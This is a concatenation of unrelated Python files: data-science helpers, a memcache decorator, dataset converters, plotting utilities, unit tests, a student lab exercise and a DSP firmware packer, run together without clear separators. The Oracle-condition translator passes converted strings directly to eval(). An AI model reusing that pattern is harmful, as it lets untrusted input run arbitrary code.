Must input a dataframe, properties list, a source column for which to search based on cid, and a name to give as a prefix for the new columns""" empty_df = pd.DataFrame() # empty df to append results to for i, row in dataframe.iterrows(): # make sure the source column contains the cid's you want to obtain proeprties for cids = row[source_column] # will return the properties as seperate df temporary_df = pcp.get_properties( properties_list, cids, listkey_count=3, as_dataframe=True) # append result to empty dataframe empty_df = temporary_df.append(empty_df) # need to keep original order of results so this will fix that empty_df = empty_df.iloc[::-1] empty_df = empty_df.reset_index() # also resetting index # dropping the cid column from dataframe empty_df = empty_df.drop(['CID'], axis=1) # adding prefix to column names empty_df = empty_df.add_prefix(name_prefix) # concatenating to original dataframe dataframe = pd.concat([dataframe, empty_df], axis=1) return dataframe """ Mark a specific point on a mesh with some text. """ from vtkplotter import Sphere, Point, show, Text sp = Sphere().wireframe(True) pcoords = sp.getPoint(144) pt = Point(pcoords, r=12, c="white") tx = Text("my fave\npoint", pcoords, s=0.1, c="lightblue", bc="green", followcam=False) show(sp, pt, tx, Text(__doc__), axes=1) """memorised module - container for the memorise python-memcache decorator""" __author__ = ' ' __docformat__ = 'restructuredtext en' __version__ = '1.0.1' from functools import wraps from hashlib import md5 import inspect import itertools import memcache from memorised import compat class memorise(object): """Decorate any function or class method/staticmethod with a memcace enabled caching wrapper. Similar to the memoise pattern, this will push mutator operators into memcache.Client.set(), and pull accessor operations from memcache.Client.get(). An MD5 hash of values, such as attributes on the parent instance/class, and arguements, is used as a unique key in memcache. :Parameters: `mc` : memcache.Client The memcache client instance to use. `mc_servers` : list A list of memcache servers to use in the cluster. `parent_keys` : list A list of attributes in the parent instance or class to use for key hashing. `set` : string An attribute present in the parent instance or class to set to the same value as the cached return value. Handy for keeping models in line if attributes are accessed directly in other places, or for pickling instances. `ttl` : integer Tells memcached the time which this value should expire. We default to 0 == cache forever. None is turn off caching. `update` : boolean If `invalidate` is False, Refresh ttl value in cache. 
If `invalidate` is True, set the cache value to `value` `invalidate` : boolean Invalidates key `value` : object used only if invalidate == True and update == True set the cached value to `value` """ def __init__(self, mc=None, mc_servers=None, parent_keys=[], set=None, ttl=0, update=False, invalidate=False, value=None): # Instance some default values, and customisations self.parent_keys = parent_keys self.set = set self.ttl = ttl self.update = update self.invalidate = invalidate self.value = value if not mc: if not mc_servers: mc_servers = ['localhost:11211'] self.mc = memcache.Client(mc_servers, debug=0) else: self.mc = mc def __call__(self, fn): @wraps(fn) def wrapper(*args, **kwargs): key = self.key(fn, args, kwargs) if self.mc: # Try and get the value from memcache if self.invalidate and self.update: output = self.value else: output = (not self.invalidate) and self.get_cache(key) exist = True if output is None: exist = False # Otherwise get the value from # the function/method output = self.call_function(fn, args, kwargs) if self.update or not exist: if output is None: set_value = memcache_none() else: set_value = output self.set_cache(key, set_value) if output.__class__ is memcache_none: # Because not-found keys return # a None value, we use the # memcache_none stub class to # detect these, and make a # distinction between them and # actual None values output = None if self.set: # Set an attribute of the parent # instance/class to the output value, # this can help when other code # accesses attribures directly, or you # want to pickle the instance set_attr = getattr(fn.__class__, self.set) set_attr = output else: # No memcache client instance available, just # return the output of the method output = self.call_function(fn, args, kwargs) return output return wrapper def call_function(self, fn, args, kwargs): return fn(*args, **kwargs) def key(self, fn, args, kwargs): # Get a list of arguement names from the func_code # attribute on the function/method instance, so we can # test for the presence of self or cls, as decorator # wrapped instances lose frame and no longer contain a # reference to their parent instance/class within this # frame func_code = compat.get_function_code(fn) argnames = func_code.co_varnames[:func_code.co_argcount] method = False static = False if len(argnames) > 0: if argnames[0] == 'self' or argnames[0] == 'cls': method = True if argnames[0] == 'cls': static = True arg_values_hash = [] # Grab all the keyworded and non-keyworded arguements so # that we can use them in the hashed memcache key for i, v in sorted(itertools.chain(compat.izip(argnames, args), compat.iteritems(kwargs))): if i != 'self': if i != 'cls': arg_values_hash.append("%s=%s" % (i, v)) class_name = None if method: keys = [] if len(self.parent_keys) > 0: for key in self.parent_keys: keys.append("%s=%s" % (key, getattr(args[0], key))) keys = ','.join(keys) if static: # Get the class name from the cls argument class_name = args[0].__name__ else: # Get the class name from the self argument class_name = args[0].__class__.__name__ module_name = inspect.getmodule(args[0]).__name__ parent_name = "%s.%s[%s]::" % (module_name, class_name, keys) else: # Function passed in, use the module name as the # parent parent_name = inspect.getmodule(fn).__name__ # Create a unique hash of the function/method call key = "%s%s(%s)" % (parent_name, fn.__name__, ",".join(arg_values_hash)) key = key.encode('utf8') if isinstance(key, compat.text_type) else key key = md5(key).hexdigest() return key def get_cache(self, key): 
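# Thin wrappers around the memcache client: get_cache returns None on a cache miss
# (which is why the wrapper above stores the memcache_none sentinel in place of a real
# None return), and set_cache forwards the configured ttl through the time= argument
# whenever one is set.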
return self.mc.get(key) def set_cache(self, key, value): if self.ttl is not None: self.mc.set(key, value, time=self.ttl) else: self.mc.set(key, value) class memcache_none: """Stub class for storing None values in memcache, so we can distinguish between None values and not-found entries. """ pass if __name__ == '__main__': # Run unit tests from memorised import tests tests.run() import re import datetime as dt from dateutil.relativedelta import relativedelta """ Oracle 存储过程转义器 author: zhangjinwei 功能: 将常见的oracle if 条件判断式中的条件里的公式,转化成python语言,来在python里进行布尔判断 oracle 函数如to_date等,需要在本页自定义,可自由扩展 to_char(trunc(sysdate - 60, 'MM'), 'yyyymmdd') >= '20200111' 转换成 to_char(trunc(dt.datetime.now() + relativedelta(days=int(-60)), 'mm'), 'yyyymmdd') >= '20200111' """ def to_date(string: str, pattern: str): string, pattern = string.lower(), pattern.lower() pattern = pattern.replace('yyyy', '%Y') pattern = pattern.replace('yy', '%y') pattern = pattern.replace('mm', '%m') pattern = pattern.replace('dd', '%d') date = dt.datetime.strptime(string, pattern) return date def to_char(date_time, pattern): pattern = pattern.lower() pattern = pattern.replace('yyyy', '%Y') pattern = pattern.replace('yy', '%y') pattern = pattern.replace('mm', '%m') pattern = pattern.replace('dd', '%d') date_string = dt.datetime.strftime(date_time, pattern) return date_string def add_months(date_time, mon_number): assert int(mon_number) == mon_number, '与Oracle不同,本函数只支持整数加减,本次入参( %s )' % str(mon_number) return date_time + relativedelta(months=int(mon_number)) def trunc(date_time, pattern): pattern = pattern.upper() if pattern == 'D': return dt.date(date_time.year, date_time.month, date_time.day) elif pattern in ('M', 'MONTH', 'MM'): return dt.date(date_time.year, date_time.month, 1) def sign_transform(string): """Oracle 符号转换函数, 目的是转换日期加减格式到python格式""" pattern1 = re.compile(r'(?:to_date|date)', re.IGNORECASE) # 处理日期转换 pattern2 = re.compile(r'([-+]) *(\d*)\b,') # 处理加减日期法 pattern3 = re.compile(r'(\bdate\b\s*?)(\'.*?\')', re.IGNORECASE) pattern4 = re.compile(r'([a-zA-Z0-9_ ]+)(=)([a-zA-Z0-9_ ]+)') # 找单个的等号 searched1, searched2, searched3, searched4 = pattern1.search(string), pattern2.search(string), pattern3.search(string), pattern4.search(string) if searched4: string = re.sub(pattern4, r'\1==\3', string) if searched1 and searched2: days = ''.join(searched2.groups()) # 提取加减日期数 string = re.sub(pattern2, '+ relativedelta(days=int(%s)),' % days, string) # 拼接成python能计算的日期加减公式 if searched3: dt_str = searched3.group(2).replace('-', '').replace('\\', '') string = re.sub(pattern3, "to_date(%s, 'yyyymmdd')" % dt_str, string) string = string.replace('sysdate', 'dt.datetime.now()') return string def if_analyser(string): """调用python的eval函数计算True false""" trans = sign_transform(string.strip().lower()) # print('if_analyser>>', trans) boool = eval(trans) boool = 1 if boool else 0 return boool if __name__ == '__main__': s = "to_char(trunc(sysdate - 60, 'MM'), 'yyyymmdd') >= '20200111'" result = if_analyser(s) print(result) from dataset_converters.ConverterBase import ConverterBase import json import os import xmltodict import cv2 labels = [ 'background', 'aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow', 'diningtable', 'dog', 'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor', ] class VOC2COCOConverter(ConverterBase): formats = ['VOC2COCO'] def __init__(self, copy_fn): ConverterBase.__init__(self, copy_fn) def _get_hw(self, image_path): return cv2.imread(image_path).shape[:2] def 
_get_segm(self, bbox): x, y, w, h = bbox segm = [[x, y, x + w, y, x + w, y + h, x, y + h]] return segm def _read_filenames(self, file): with open(file, 'r') as f: return [x.replace('\n', '') for x in f.readlines()] def _read_bbox(self, name, input_folder): annotations_folder = os.path.join(input_folder, 'Annotations') annotation_file = os.path.join(annotations_folder, name + '.xml') anno = {} with open(annotation_file, 'rb') as f: anno = xmltodict.parse(f) bboxes = [] areas = [] lbls = [] objects = anno['annotation']['object'] if not isinstance(objects, list): objects = [objects] for object in objects: name = object['name'] lbls.append(labels.index(name)) bbox_dict = object['bndbox'] xmin = int(bbox_dict['xmin']) ymin = int(bbox_dict['ymin']) xmax = int(bbox_dict['xmax']) ymax = int(bbox_dict['ymax']) width, height = xmax - xmin, ymax - ymin bbox = xmin, ymin, width, height bboxes.append(bbox) areas.append(width * height) return bboxes, areas, lbls def _process_images(self, names, input_folder, images_folder, output_images_folder, output_annotations_file): self._ensure_folder_exists_and_is_clear(output_images_folder) to_dump = {'images': [], 'type': 'instances', 'annotations': [], 'categories': []} instance_counter = 1 for i, name in enumerate(names): image_name = name + '.jpg' full_image_name = os.path.join(images_folder, image_name) h, w = self._get_hw(full_image_name) to_dump['images'].append( { 'file_name': image_name, 'height': h, 'width': w, 'id': i + 1 } ) bboxes, areas, lbls = self._read_bbox(name, input_folder) for bbox, area, label in zip(bboxes, areas, lbls): segm = self._get_segm(bbox) to_dump['annotations'].append( { 'segmentation': segm, 'area': area, 'iscrowd': 0, 'image_id': i + 1, 'bbox': bbox, 'category_id': label, 'id': instance_counter, 'ignore': 0 } ) instance_counter += 1 self.copy(full_image_name, output_images_folder) for i, label in enumerate(labels): if i == 0: continue to_dump['categories'].append({'supercategory': 'none', 'id': i, 'name': label}) with open(output_annotations_file, 'w') as f: json.dump(to_dump, f) def _run(self, input_folder, output_folder, FORMAT): images_folder = os.path.join(input_folder, 'JPEGImages') train_images = self._read_filenames(os.path.join(input_folder, 'ImageSets', 'Main', 'train.txt')) val_images = self._read_filenames(os.path.join(input_folder, 'ImageSets', 'Main', 'val.txt')) annotations_folder = os.path.join(output_folder, 'annotations') self._ensure_folder_exists_and_is_clear(output_folder) self._ensure_folder_exists_and_is_clear(annotations_folder) self._process_images(val_images, input_folder, images_folder, os.path.join(output_folder, 'val'), os.path.join(annotations_folder, 'val.json')) self._process_images(train_images, input_folder, images_folder, os.path.join(output_folder, 'train'), os.path.join(annotations_folder, 'train.json')) import numpy as np import pandas as pd import torch import multiprocessing print('Cpu count =', multiprocessing.cpu_count()) a = np.array([1, 2, 3]) df = pd.DataFrame(a) device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') print('Using device:', device) print() #Additional Info when using cuda if device.type == 'cuda': print(torch.cuda.get_device_name(0)) print('Memory Usage:') print('Allocated:', round(torch.cuda.memory_allocated(0)/1024**3,1), 'GB') print('Cached: ', round(torch.cuda.memory_cached(0)/1024**3,1), 'GB') week10/lab10/weather.py #This file is completed by partner work for lab 10 part 1 and 2 #Author #Author #partI #readlines() def main1(): myFile = 
open('rainfall.txt','r') accumulator = 0 myFileList = myFile.readlines() minimum = 100 maximum = 0 for lst in myFileList: temperatureList = lst.split() temperature = float(temperatureList[1]) if temperature < minimum: minimum = temperature if temperature > maximum: maximum = temperature accumulator += temperature lstAverage = accumulator / len(myFileList) print('average =',lstAverage,',minimum =',minimum,',maximum =', maximum) main1() #forloop def main2(): myFile = open('rainfall.txt','r') accumulator = 0 accu = 0 for lst in myFile: accu += 1 temperatureList = lst.split() accumulator += float(temperatureList[1]) lstAverage = accumulator / accu print(lstAverage) main2() #readline() def main3(): myFile = open('rainfall.txt','r') accu = 0 tempaccumulator = 0 minimum = 100 maximum = 0 temperature = 0 line = myFile.readline() while line: print(line) line_list = line.split() print(line_list[1]) temp = float(line_list[1]) if temp < minimum: minimum = temp if temp > maximum: maximum = temp tempaccumulator += temp accu += 1 line = myFile.readline() averageTemp = tempaccumulator / accu print('average =',averageTemp,',minimum =',minimum,',maximum =', maximum) #read() def main4(): accu = 0 tempaccumulator = 0 minimum = 100 maximum = 0 temperature = 0 myFile = open('rainfall.txt','r') temp_acc = -0 giant_string = myFile.read() giant_list = giant_string.split("\n") for line in giant_list: if line: line_list = line.split() temp = float(line_list[1]) if temp < minimum: minimum = temp if temp > maximum: maximum = temp tempaccumulator += temp accu += 1 else: break averageTemp = tempaccumulator / accu print('average =',averageTemp,',minimum =',minimum,',maximum =', maximum) main4() #partII def main5(): myFile = open('conversion.txt','w') myFile.write('Fahrenheit Celcius\n') for i in range(-300,213): tempF = i tempC = (5/9)*(i-32) myFile.write('%10.2f %10.2f\n' % (tempF, tempC)) myFile.close() myFile = open('conversion.txt','r') main5() 1-10 from math import log10 import numpy as np from matplotlib.gridspec import GridSpec from matplotlib.ticker import Formatter, NullFormatter, EngFormatter from mpl_toolkits.axes_grid1 import make_axes_locatable SINGLE_SUBPLOT_SPEC = GridSpec(1, 1).new_subplotspec((0, 0), 1, 1) class PrintFirstHalfFormatter(Formatter): ''' A custom formatter which uses a NullFormatter for some labels and delegates to another formatter for others. ''' def __init__(self, other, maxVal=5): self.__other = other self.__null = NullFormatter() self.__max = log10(maxVal) def __call__(self, x, pos=None): func = self.__other if self.shouldShow(x) else self.__null return func(x, pos) def shouldShow(self, x): return log10(x) % 1 <= self.__max def configureFreqAxisFormatting(axes): ''' Configures the x axis of the supplied axes to render Frequency values in a log format. :param axes: ''' hzFormatter = EngFormatter(places=0) axes.get_xaxis().set_major_formatter(hzFormatter) axes.get_xaxis().set_minor_formatter(PrintFirstHalfFormatter(hzFormatter)) def format_axes_dbfs_hz(axes): ''' Applies formatting applicable to a dbFS vs Hz line chart. :param axes: the axes to format. ''' axes.set_xlim(left=20, right=20000) axes.grid(linestyle='-', which='major') axes.grid(linestyle='--', which='minor') axes.set_ylabel('dBFS') axes.set_xlabel('Hz') def calculate_dBFS_Scales(data, max_range=60, vmax_to_round=True): ''' Calculates the min/max in the data and returns the steps to use when displaying lines on a chart, this uses -2 for the first 12 and then -6 thereafter. :param data: the data. 
:param max_range: the max range. :return: max, min, steps, fillSteps ''' vmax = np.math.ceil(np.nanmax(data)) # coerce max to a round value if vmax_to_round: multiple = 5 if max_range <= 30 else 10 if vmax % multiple != 0: vmax = (vmax - vmax % multiple) + multiple vmin = vmax - max_range steps = np.sort(np.concatenate((np.arange(vmax, vmax - 14, -2), np.arange(vmax - 18, vmin - 6, -6)))) fillSteps = np.sort(np.arange(vmax, vmin, -0.05)) return vmax, vmin, steps, fillSteps def set_y_limits(axes, dBRange): ''' Updates the decibel range on the chart. :param axes: the axes. :param dBRange: the new range. ''' if axes is not None: ylim = axes.get_ylim() axes.set_ylim(bottom=ylim[1] - dBRange, top=ylim[1]) def colorbar(mappable, **kwargs): ''' Creates a colour bar for a given plot that will exist at a specific position relative to the given chart. :param mappable: the plot. :param **kwargs: passed through to colorbar. :return: the colorbar. ''' ax = mappable.ax fig = ax.figure divider = make_axes_locatable(ax) cax = divider.append_axes("right", size="5%", pad=0.05) return fig.colorbar(mappable, cax=cax, **kwargs) 0 # Copyright (C) 2009 - 2016 Open Microscopy Environment: # - Board of Regents of the University of Wisconsin-Madison # - Glencoe Software, Inc. # - University of Dundee # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDERS OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. import logging from ome.modeltools import config from ome.modeltools import language from ome.modeltools.exceptions import ModelProcessingError class OMEModelEntity(object): """ An abstract root class for properties and model objects containing common type resolution and text processing functionality. """ def resolveLangTypeFromSimpleType(self, simpleTypeName): getSimpleType = self.model.getTopLevelSimpleType while True: simpleType = getSimpleType(simpleTypeName) if simpleType is None: logging.debug("No simpleType found with name: %s" % simpleTypeName) # Handle cases where the simple type is prefixed by # a namespace definition. (ex. OME:LSID). namespaceless = simpleTypeName.split(':')[-1] if namespaceless != simpleTypeName: simpleTypeName = namespaceless continue break logging.debug("%s simpleType dump: %s" % (self, simpleType.__dict__)) # It's possible the simpleType is a union of other # simpleTypes so we need to handle that. 
We assume # that all the unioned simpleTypes are of the same # base type (ex. "xsd:string" or "xsd:float"). if simpleType.unionOf: union = getSimpleType(simpleType.unionOf[0]) if self.model.opts.lang.hasType(union.getBase()): return self.model.opts.lang.type(union.getBase()) else: simpleTypeName = union.getBase() if self.model.opts.lang.hasType(simpleType.getBase()): return self.model.opts.lang.type(simpleType.getBase()) else: simpleTypeName = simpleType.getBase() # TODO: The above logic looks wrong. simpleTypeName is # asigned but not used and then nothing is returned. def lowerCasePrefix(self, v): if v is None: raise ModelProcessingError( 'Cannot lower case %s on %s' % (v, self.name)) match = config.PREFIX_CASE_REGEX.match(v) if match is None: raise ModelProcessingError( 'No prefix match for %s on %s' % (v, self.name)) prefix, = [_f for _f in match.groups() if _f] return prefix.lower() + v[len(prefix):] def _get_argumentName(self): argumentName = config.REF_REGEX.sub('', self.name) argumentName = self.lowerCasePrefix(argumentName) if isinstance(self.model.opts.lang, language.CXX): if (argumentName == "namespace"): argumentName = "namespace_" elif (argumentName == "union"): argumentName = "union_" return argumentName argumentName = property( _get_argumentName, doc="""The property's argument name (camelCase).""") def _get_methodName(self): try: name = config.BACK_REFERENCE_NAME_OVERRIDE[self.key] return name[0].upper() + name[1:] except (KeyError, AttributeError): pass return config.BACKREF_REGEX.sub( '', config.REF_REGEX.sub('', self.name)) methodName = property( _get_methodName, doc="""The property's method name.""") def _get_isGlobal(self): isGlobal = self._isGlobal try: if self.isBackReference: ref = self.model.getObjectByName( config.BACKREF_REGEX.sub('', self.type)) if ref.name == self.name: return isGlobal return isGlobal or ref.isGlobal except AttributeError: pass if self.isReference: ref = self.model.getObjectByName( config.REF_REGEX.sub('', self.type)) if ref.name == self.name: return isGlobal isGlobal = isGlobal or ref.isGlobal return isGlobal isGlobal = property( _get_isGlobal, doc="""Whether or not the model object is an OMERO system type.""") def _get_isManyToMany(self): try: if self.isBackReference: reference_to = self.model.getObjectByName(self.type) for prop in reference_to.properties.values(): if prop.type == self.parent.name + 'Ref': return prop.isManyToMany except AttributeError: pass return self.manyToMany isManyToMany = property( _get_isManyToMany, doc="""Whether or not the entity is a many-to-many reference.""") def _get_isSettings(self): return self.name.endswith('Settings') isSettings = property( _get_isSettings, doc="""Whether or not the entity is a Settings reference.""") notebooks/_solutions/case2_observations_processing11.py (survey_data_decoupled .groupby("year") .size() .plot(kind='barh', color="#00007f", figsize=(10, 10)))N = int(input()) t = N * 108 // 100 if t < 206: print('Yay!') elif t == 206: print('so-so') elif t > 206: print(':(') keepertech/kt.testing1-10 """\ Tests for kt.testing test fixture composition. These tests use ``nose`` used for handling tests; something different will be needed to ensure we work with other test runners. 
""" import kt.testing import kt.testing.tests class FixtureUsingBaseClass(kt.testing.FixtureComponent): """Test fixture component derived from provided base class.""" def __init__(self, testcase): super(FixtureUsingBaseClass, self).__init__(testcase) testcase.record.append((self.test, 'derived init')) def setup(self): super(FixtureUsingBaseClass, self).setup() self.test.record.append((self.test, 'derived setup')) self.test.addCleanup( lambda: self.test.record.append((self.test, 'derived cleanup'))) def teardown(self): super(FixtureUsingBaseClass, self).teardown() self.test.record.append((self.test, 'derived teardown')) class IndependentFixture(object): """Test fixture component not using provided base class.""" def __init__(self, testcase, state=42): self.test = testcase testcase.record.append((self.test, 'independent init')) self.state = state def setup(self): self.test.record.append((self.test, 'independent setup')) self.test.addCleanup( lambda: self.test.record.append((self.test, 'independent cleanup'))) def teardown(self): self.test.record.append((self.test, 'independent teardown')) def complain(self, msg): self.test.record.append((self.test, 'independent complaint: %s' % msg)) raise AssertionError('using independent class: %s' % msg) class FixtureWithoutTeardown(object): def __init__(self, testcase): self.test = testcase testcase.record.append((self.test, 'teardownless init')) def setup(self): self.test.record.append((self.test, 'teardownless setup')) self.test.addCleanup( lambda: self.test.record.append((self.test, 'teardownless cleanup'))) class TestComposition(kt.testing.tests.Core): def test_simple_usage(self): self.check_simple_usage(kt.testing.TestCase) def test_simple_usage_derived(self): class TC(kt.testing.TestCase): pass self.check_simple_usage(TC) def test_simple_usage_overridden_new(self): class AlternateBase(object): def __new__(cls, *args, **kwargs): rv = object.__new__(cls) rv.alternate_base = True return rv class MagicTC(kt.testing.TestCase, AlternateBase): pass class DerivedTC(MagicTC): def runTest(self): """Just a dummy.""" # Make sure our special __new__ was invoked. tc = DerivedTC() assert tc.alternate_base self.check_simple_usage(MagicTC) def check_simple_usage(self, baseclass): class TC(baseclass): usingbase = kt.testing.compose(FixtureUsingBaseClass) independent = kt.testing.compose(IndependentFixture) record = [] def test_this(self): self.record.append((self, 'test_this')) def test_the_other(self): self.record.append((self, 'test_the_other')) # Rely on tests being sorted in alphabetical order by method name. tto, tt = self.loader.makeTest(TC) tto_tc = tto tt_tc = tt self.run_one_case(tto) tto_record = [msg for tc, msg in TC.record if tc is tto_tc] tt_record = [msg for tc, msg in TC.record if tc is tt_tc] assert tto_record == [ 'derived init', 'independent init', 'derived setup', 'independent setup', 'test_the_other', # # Note the intermixing of teardown and cleanups; the # teardowns for the fixture components are handled as # teardowns for the test itself. 
# 'independent teardown', 'independent cleanup', 'derived teardown', 'derived cleanup', ] # The fixture components have already been created for test_this # as well, but the setup methods haven't been called: assert tt_record == [ 'derived init', 'independent init', ] self.run_one_case(tt) tt_record = [msg for tc, msg in TC.record if tc is tt_tc] assert tt_record == [ 'derived init', 'independent init', 'derived setup', 'independent setup', 'test_this', 'independent teardown', 'independent cleanup', 'derived teardown', 'derived cleanup', ] def test_inherited_fixture_components(self): class TCOne(kt.testing.TestCase): usingbase = kt.testing.compose(FixtureUsingBaseClass) class TCTwo(TCOne): independent = kt.testing.compose(IndependentFixture) record = [] def test_this(self): self.record.append((self, 'test_this')) tt, = self.loader.makeTest(TCTwo) self.run_one_case(tt) tt_record = [msg for tc, msg in TCTwo.record] assert tt_record == [ 'derived init', 'independent init', 'derived setup', 'independent setup', 'test_this', 'independent teardown', 'independent cleanup', 'derived teardown', 'derived cleanup', ] def test_case_can_use_fixture_api(self): class TC(kt.testing.TestCase): fixture = kt.testing.compose(IndependentFixture) record = [] def test_this(self): self.record.append((self, 'test_this')) self.state = self.fixture.state self.fixture.complain('bleh') tt, = self.loader.makeTest(TC) result = self.run_one_case(tt) tt_record = [msg for tc, msg in TC.record] assert tt.state == tt.fixture.state assert tt_record == [ 'independent init', 'independent setup', 'test_this', 'independent complaint: bleh', 'independent teardown', 'independent cleanup', ] (xtc, err), = result.failures assert xtc is tt assert err.startswith('Traceback (most recent call last):') assert 'using independent class: bleh' in err def test_fixture_components_construction_args(self): class TC(kt.testing.TestCase): fixture = kt.testing.compose(IndependentFixture, 24) self.check_fixture_components_construction(TC) def test_fixture_components_construction_kwargs(self): class TC(kt.testing.TestCase): fixture = kt.testing.compose(IndependentFixture, state=24) self.check_fixture_components_construction(TC) def check_fixture_components_construction(self, cls): class TC(cls): record = [] def test_this(self): self.state = self.fixture.state tt, = self.loader.makeTest(TC) self.run_one_case(tt) assert tt.state == 24 # If the fixture component doesn't have a teardown method, it isn't # added to the cleanup list. def test_fixture_without_teardown(self): class TC(kt.testing.TestCase): fixture = kt.testing.compose(FixtureWithoutTeardown) record = [] def test_this(self): self.record.append((self, 'test_this')) tt, = self.loader.makeTest(TC) self.run_one_case(tt) tt_record = [msg for tc, msg in TC.record] assert tt_record == [ 'teardownless init', 'teardownless setup', 'test_this', 'teardownless cleanup', ] # Overriding a fixture component property doesn't make the component # inaccessible; aliases for component properties work just fine. 
def test_component_property_alias(self): class TCBase(kt.testing.TestCase): fixture = kt.testing.compose(IndependentFixture, state='original') class TC(TCBase): orig = TCBase.fixture fixture = kt.testing.compose(IndependentFixture, state='override') record = [] def test_this(self): """Just a dummy.""" tc, = self.loader.makeTest(TC) assert tc.orig.state == 'original' assert tc.fixture.state == 'override' def test_inherited_cooperative_setup(self): """\ Co-operative setup is supported when appropriate bases are omitted. We do this because it's really important that our setUp method is invoked, so it should be drop-dead easy. """ class TCBase(kt.testing.TestCase): # No fixture composition here. def setUp(self): super(TCBase, self).setUp() self.record.append((self, 'TCBase setup')) class TC(TCBase): fixture = kt.testing.compose(FixtureWithoutTeardown) record = [] def test_this(self): self.record.append((self, 'test_this')) tt, = self.loader.makeTest(TC) self.run_one_case(tt) tt_record = [msg for tc, msg in TC.record] assert tt_record == [ 'teardownless init', 'teardownless setup', 'TCBase setup', 'test_this', 'teardownless cleanup', ] 1-10 import os import sys elfFileName = sys.argv[1] baseName = os.path.basename(elfFileName) projectName = os.path.splitext(baseName)[0] # print("projectName",projectName) def writeNum(numString,size): hexString = "0x" + numString hexNum = int(hexString, 16) hexBytes = hexNum.to_bytes(size, byteorder='little', signed=False) dspFile.write(hexBytes); def writeHexNum(hexNum, size): hexBytes = hexNum.to_bytes(size, byteorder='little', signed=False) dspFile.write(hexBytes); def stringToNum(numString): hexString = "0x" + numString num = int(hexString, 16) return num def getOffsetData(line): line = line.strip() line = line.replace('@','') # print(line) x = line.split(" ") offset = stringToNum(x[0]) data = stringToNum(x[1]) return offset, data def padZeros(num,size): zeroString = "0" # print(num,size) if(num > 0): for x in range(num): writeNum(zeroString,size) dspFile = open("dsp_mem.bin", "wb") pmemFile = elfFileName+".PMEM" # print("pmemFile",pmemFile) size = os.path.getsize(pmemFile) # print(size) pmemCount = 0 if(size > 0): file1 = open(pmemFile, 'r') file1.readline() offset, data = getOffsetData(file1.readline()) padZeros(offset, 1) pmemCount = offset file1 = open(pmemFile, 'r') file1.readline() Lines = file1.readlines() # if(Lines[0] != ""): # # print("Valid pmem file") for line in Lines: offset, data = getOffsetData(line) diff = offset - pmemCount padZeros(diff, 4) writeHexNum(data,4) pmemCount = pmemCount + diff + 1 # print(pmemCount) file1.close() else: writeHexNum(0,4) pmemCount = 1 # print("pmemCount:",pmemCount) xmemFile = elfFileName+".XMEM" size = os.path.getsize(xmemFile) # print(size) xmemCount = 0 if(size > 0): file1 = open(xmemFile, 'r') offset, data = getOffsetData(file1.readline()) padZeros(offset, 1) xmemCount = offset file1.seek(0) Lines = file1.readlines() # print(Lines[0]) # if(Lines[0] != ""): # print("Valid xmem file") for line in Lines: offset, data = getOffsetData(line) diff = offset - xmemCount padZeros(diff, 1) writeHexNum(data,1) xmemCount = xmemCount + diff + 1 # print(xmemCount) file1.close() else: writeHexNum(0,2) xmemCount = 2 padding = xmemCount%2 padZeros(padding, 1) xmemCount = xmemCount + padding # print("xmemCount:",xmemCount) ymemFile = elfFileName+".YMEM" size = os.path.getsize(ymemFile) # print(size) ymemCount = 0 if(size > 0): file1 = open(ymemFile, 'r') offset, data = getOffsetData(file1.readline()) padZeros(offset, 1) 
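# Same pattern as the PMEM and XMEM sections above: zero-fill dsp_mem.bin up to the
# first YMEM offset, then rewind the dump and write each (offset, data) pair as single
# bytes, padding any gap between consecutive offsets with zeros.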
ymemCount = offset file1.seek(0) Lines = file1.readlines() # print(Lines[0]) # if(Lines[0] != ""): # print("Valid ymem file") for line in Lines: offset, data = getOffsetData(line) diff = offset - ymemCount padZeros(diff, 1) writeHexNum(data,1) ymemCount = ymemCount + diff + 1 # print(ymemCount) file1.close() else: writeHexNum(0,2) ymemCount = 2 padding = ymemCount%2 padZeros(padding, 1) ymemCount = ymemCount + padding # print("ymemCount:",ymemCount) xmemCount = xmemCount >> 1; ymemCount = ymemCount >> 1; dspFile.close() file1.close() # searchLine = "" # configFile = os.path.dirname(elfFileName) + "/../../config.h" # name = "#define CONFIG_DSP_FW_START " # address_start = 0 # with open(configFile, "r") as myfile: # for line in myfile: # if name in line: # searchLine = line # break # if searchLine: # address_split = searchLine.split() # address_start = int(address_split[2], 16) # else: # print("ERROR CONFIG_DSP_FW_START not found in config.h file") # exit(0) startingAddress = 0 # print("stringAddress", hex(startingAddress)) # projectName = "hello_world" dspFile = open("dsp_padded.bin", "wb") stringAddress = startingAddress + 28 writeHexNum(stringAddress,4) writeHexNum(pmemCount,4) writeHexNum(xmemCount,4) writeHexNum(ymemCount,4) stringLength = len(projectName) + 1 pmemAddress = stringAddress + stringLength xmemAddress = pmemAddress + pmemCount * 4 ymemAddress = xmemAddress + xmemCount * 2 # print("pmemAddress",hex(pmemAddress)) # print("xmemAddress",hex(xmemAddress)) # print("ymemAddress",hex(ymemAddress)) writeHexNum(pmemAddress,4) writeHexNum(xmemAddress,4) writeHexNum(ymemAddress,4) dspFile.write(projectName.encode('utf-8')) padZeros(1,1) dspFile.close() # 